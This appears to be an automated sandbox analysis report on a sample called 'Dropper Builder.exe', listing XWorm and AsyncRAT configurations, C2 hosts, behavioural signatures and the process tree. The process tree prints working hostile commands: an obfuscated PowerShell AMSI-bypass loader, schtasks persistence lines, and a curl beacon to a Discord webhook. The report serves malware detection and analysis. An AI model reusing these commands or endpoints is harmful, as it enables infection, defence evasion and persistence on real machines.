Analysis
max time kernel: 150s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-06-2024 05:51

Static task: static1
Behavioral task: behavioral1
  Sample: Dropper Builder.exe
  Resource: win7-20240220-en

General
Target: Dropper Builder.exe
Size: 18.6MB
MD5: c660fd4addbfaa81fac0a1f5d39cd000
SHA1: 7d1aaa224037b1ade30bb951ee04989b73d71a81
SHA256: 7e19aad8690328d389e5d037dd47c4fdcea7775ad69a0755c3e2eeba1df44ed8
SHA512: a53d1608adb02d2b7ad7109490e1dce4b073cf622a291b52cea8794ba3c0296248fa87fb8305893cfb65d44f500afc7057375368eff2fd0a2e872a6420e8d5c9
SSDEEP: 98304:c+R1sVuWzOYBvDdXCxGSQjJQaoyqUIIdZicEMtECV:ckCzFvDdXCcSQLbqUISpEMW
Malware Config
Extracted: xworm
  politics-fiber.gl.at.ply.gg:47430
  Install_directory: %AppData%
  install_file: $77-scchost.exe
Extracted: asyncrat (Default)
  environmental-blank.gl.at.ply.gg:25944
  delay: 1
  install: true
  install_file: $77-aachost.exe
  install_folder: %AppData%
Signatures
Detect Xworm Payload (2 IoCs)
Resources (yara_rule):
  C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe: family_xworm
  behavioral2/memory/3984-113-0x0000000000340000-0x0000000000352000-memory.dmp: family_xworm
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
Processes:
  PID 2840 created 612 (process: powershell.EXE, target process: winlogon.exe)
Async RAT payload (1 IoC)
Resources (yara_rule):
  C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe: family_asyncrat
Sets service image path in registry (2 TTPs, 1 IoC)
Processes:
  WaaSMedicAgent.exe: Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
  wmiprvse.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate
  wmiprvse.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up the country code configured in the registry, likely as a geofence check.
Processes:
  $77-aachost.exe: Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation
  $77-sdchost.exe: Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation
  Dropper Builder.exe: Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation
Executes dropped EXE (9 IoCs)
Processes:
  PID 3984: $77-sdchost.exe
  PID 4576: $77-aachost.exe
  PID 4280: $77-penisballs.exe
  PID 4940: $77-install.exe
  PID 4652: $77-sdchost.exe
  PID 3836: $77-aachost.exe
  PID 1048: $77-penisballs.exe
  PID 4364: $77-scchost.exe
  PID 400: $77-scchost.exe
Adds Run key to start application (2 TTPs, 1 IoC)
Processes:
  $77-sdchost.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe"
Enumerates connected drives (3 TTPs, 23 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  svchost.exe: File opened (read-only) \??\T:, \??\A:, \??\J:, \??\L:, \??\N:, \??\Q:, \??\R:, \??\M:, \??\S:, \??\V:, \??\W:, \??\H:, \??\O:, \??\U:, \??\X:, \??\Y:, \??\Z:, \??\B:, \??\E:, \??\G:, \??\I:, \??\K:, \??\P:
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 1 IoC)
Writes to the Master Boot Record (MBR) (1 TTP, 1 IoC)
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
  wmiprvse.exe: File opened for modification \??\PHYSICALDRIVE0
Drops file in System32 directory (10 IoCs)
Processes:
  $77-penisballs.exe: File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf
  svchost.exe: File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx
  svchost.exe: File opened for modification C:\Windows\System32\Tasks\$77-scchost
  $77-aachost.exe: File created C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe
  svchost.exe: File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
  powershell.EXE: File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  svchost.exe: File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx
  $77-aachost.exe: File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-aachost.exe.log
  $77-sdchost.exe: File created C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe
  powershell.EXE: File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Suspicious use of SetThreadContext (1 IoC)
Processes:
  PID 2840 set thread context of 436 (process: powershell.EXE, target process: dllhost.exe)
Drops file in Windows directory (7 IoCs)
Processes:
  svchost.exe: File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log
  svchost.exe: File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb
  svchost.exe: File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm
  svchost.exe: File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log
  svchost.exe: File opened for modification C:\Windows\SoftwareDistribution\EventCache.v2\{4E3A2C56-F6CF-44DC-94A9-BA869AC1A54A}.bin
  svchost.exe: File opened for modification C:\Windows\WindowsUpdate.log
  svchost.exe: File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Delays execution with timeout.exe (2 IoCs)
Processes:
  PID 2540: timeout.exe
  PID 4968: timeout.exe
Enumerates system info in registry (2 TTPs, 1 IoC)
Processes:
  wmiprvse.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Modifies data under HKEY_USERS (64 IoCs)
Processes: powershell.EXE, WaaSMedicAgent.exe, OfficeClickToRun.exe, dllhost.exe, $77-sdchost.exe, cmd.exe, $77-aachost.exe, svchost.exe
Modifies registry class (1 IoC)
Processes:
  Dropper Builder.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Scheduled Task/Job: Scheduled Task (1 TTP, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  PID 2200: schtasks.exe
  PID 4988: schtasks.exe
  PID 2972: schtasks.exe
  PID 4584: schtasks.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: powershell.EXE, $77-aachost.exe, dllhost.exe, $77-penisballs.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: $77-sdchost.exe, $77-penisballs.exe, powershell.EXE, $77-aachost.exe, dllhost.exe, svchost.exe, Explorer.EXE, WMIC.exe
Suspicious use of FindShellTrayWindow (3 IoCs)
Processes:
  PID 3572: Explorer.EXE
  PID 3572: Explorer.EXE
  PID 3572: Explorer.EXE
Suspicious use of SendNotifyMessage (3 IoCs)
Processes:
  PID 3572: Explorer.EXE
  PID 3572: Explorer.EXE
  PID 3572: Explorer.EXE
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:
  PID 4280: $77-penisballs.exe
  PID 1048: $77-penisballs.exe
Suspicious use of UnmapMainImage (1 IoC)
Processes:
  PID 676: RuntimeBroker.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: Dropper Builder.exe, cmd.exe, powershell.EXE, $77-aachost.exe, dllhost.exe
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
[1] C:\Windows\system32\winlogon.exe
    command line: winlogon.exe
  [2] C:\Windows\system32\dwm.exe
      command line: "dwm.exe"
  [2] C:\Windows\System32\dllhost.exe
      command line: C:\Windows\System32\dllhost.exe /Processid:{1560c5bc-66e8-4bee-b24c-ba981a93522f}
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
        - Executes dropped EXE
        - Drops file in System32 directory
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\schtasks.exe
          command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
          - Scheduled Task/Job: Scheduled Task
        [5] C:\Windows\System32\Conhost.exe
            command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
        - Executes dropped EXE
        - Drops file in System32 directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit
        [5] C:\Windows\System32\Conhost.exe
            command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        [5] C:\Windows\system32\schtasks.exe
            command line: schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'
            - Scheduled Task/Job: Scheduled Task
      [4] C:\Windows\system32\cmd.exe
          command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmpA9FB.tmp.bat""
          - Modifies data under HKEY_USERS
        [5] C:\Windows\System32\Conhost.exe
            command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        [5] C:\Windows\system32\timeout.exe
            command line: timeout 3
            - Delays execution with timeout.exe
    [3] C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
        - Executes dropped EXE
        - Drops file in System32 directory
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
[1] C:\Windows\system32\lsass.exe
    command line: C:\Windows\system32\lsass.exe
[1] C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
[1] C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[1] C:\Windows\System32\svchost.exe
    command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
[1] C:\Windows\System32\svchost.exe
    command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
[1] C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
[1] C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
    - Drops file in System32 directory
  [2] C:\Windows\system32\taskhostw.exe
      command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HYFdDFDTpyLF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kzdYLOBIQUGoND,[Parameter(Position=1)][Type]$RFcHZzaONv)$kBhbHTEolUP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+'c'+[Char](116)+''+'e'+'d'+[Char](68)+''+[Char](101)+'l'+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'el'+'e'+''+[Char](103)+''+[Char](97)+''+'t'+'e'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+''+'e'+''+'a'+''+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$kBhbHTEolUP.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+'i'+'a'+'l'+'N'+[Char](97)+'m'+'e'+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+'bli'+'c'+'',[Reflection.CallingConventions]::Standard,$kzdYLOBIQUGoND).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$kBhbHTEolUP.DefineMethod('I'+'n'+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+',H'+[Char](105)+''+[Char](100)+''
+[Char](101)+'By'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'N'+''+'e'+'w'+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RFcHZzaONv,$kzdYLOBIQUGoND).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+',M'+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $kBhbHTEolUP.CreateType();}$sweZnEGrkVLkX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType('Mi'+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+[Char](85)+''+'n'+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+'t'+[Char](104)+''+[Char](111)+''+'d'+'s');$EpMjWwMHmylFWv=$sweZnEGrkVLkX.GetMethod('Get'+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+'d'+'r'+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BYqbBcnCXGWvuPcKYXw=HYFdDFDTpyLF @([String])([IntPtr]);$KrlzDjBxAwVYdEORYoHyUX=HYFdDFDTpyLF 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$beFIbIsMbYj=$sweZnEGrkVLkX.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'eH'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+'l')));$TQsUUPEUmAKZKo=$EpMjWwMHmylFWv.Invoke($Null,@([Object]$beFIbIsMbYj,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+'L'+[Char](105)+'b'+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$jljYdLiNhUbrXalZm=$EpMjWwMHmylFWv.Invoke($Null,@([Object]$beFIbIsMbYj,[Object]('Vi'+[Char](114)+'tu'+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+'c'+''+[Char](116)+'')));$gWZHett=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TQsUUPEUmAKZKo,$BYqbBcnCXGWvuPcKYXw).Invoke('am'+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$jKUEWHcKZfelKnHjH=$EpMjWwMHmylFWv.Invoke($Null,@([Object]$gWZHett,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+'r')));$tbryIxHVtp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jljYdLiNhUbrXalZm,$KrlzDjBxAwVYdEORYoHyUX).Invoke($jKUEWHcKZfelKnHjH,[uint32]8,4,[ref]$tbryIxHVtp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jKUEWHcKZfelKnHjH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jljYdLiNhUbrXalZm,$KrlzDjBxAwVYdEORYoHyUX).Invoke($jKUEWHcKZfelKnHjH,[uint32]8,0x20,[ref]$tbryIxHVtp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+'T'+'WA'+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'st'+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe (level 3)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exe (level 2)
  C:\Users\Admin\AppData\Roaming\$77-scchost.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exe (level 2)
  C:\Users\Admin\AppData\Roaming\$77-scchost.exe
- Executes dropped EXE
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
-
C:\Windows\system32\sihost.exe (level 2)
  sihost.exe
-
C:\Windows\System32\svchost.exe (level 1)
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
-
C:\Windows\System32\svchost.exe (level 1)
  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
-
C:\Windows\System32\svchost.exe (level 1)
  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
-
C:\Windows\System32\svchost.exe (level 1)
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
-
C:\Windows\System32\svchost.exe (level 1)
  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
-
C:\Windows\System32\svchost.exe (level 1)
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
-
C:\Windows\System32\svchost.exe (level 1)
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
-
C:\Windows\System32\svchost.exe (level 1)
  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
-
C:\Windows\System32\spoolsv.exe (level 1)
  C:\Windows\System32\spoolsv.exe
-
C:\Windows\System32\svchost.exe (level 1)
  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exe (level 1)
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exe (level 1)
  C:\Windows\sysmon.exe
-
C:\Windows\System32\svchost.exe (level 1)
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
-
C:\Windows\system32\wbem\unsecapp.exe (level 1)
  C:\Windows\system32\wbem\unsecapp.exe -Embedding
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
-
C:\Windows\Explorer.EXE (level 1)
  C:\Windows\Explorer.EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe (level 2)
  "C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe"
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe (level 3)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\SysWOW64\cmd.exe (level 3)
  "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.exe (level 4)
  curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe (level 3)
  "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe (level 4)
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe (level 3)
  "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe (level 4)
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe (level 5)
  schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exe (level 4)
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9F0F.tmp.bat""
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe (level 5)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\system32\timeout.exe (level 5)
  timeout 3
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe (level 3)
  "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exe (level 3)
  "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe (level 2)
  "C:\Windows\system32\cmd.exe"
-
C:\Windows\System32\Conhost.exe (level 3)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\System32\Wbem\WMIC.exe (level 3)
  wmic csproduct get UUID
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exe (level 3)
  wmic csproduct get UUID UUID
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
-
C:\Windows\system32\DllHost.exe (level 1)
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\System32\RuntimeBroker.exe (level 1)
  C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\System32\RuntimeBroker.exe (level 1)
  C:\Windows\System32\RuntimeBroker.exe -Embedding
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exe (level 1)
  C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\system32\SppExtComObj.exe (level 1)
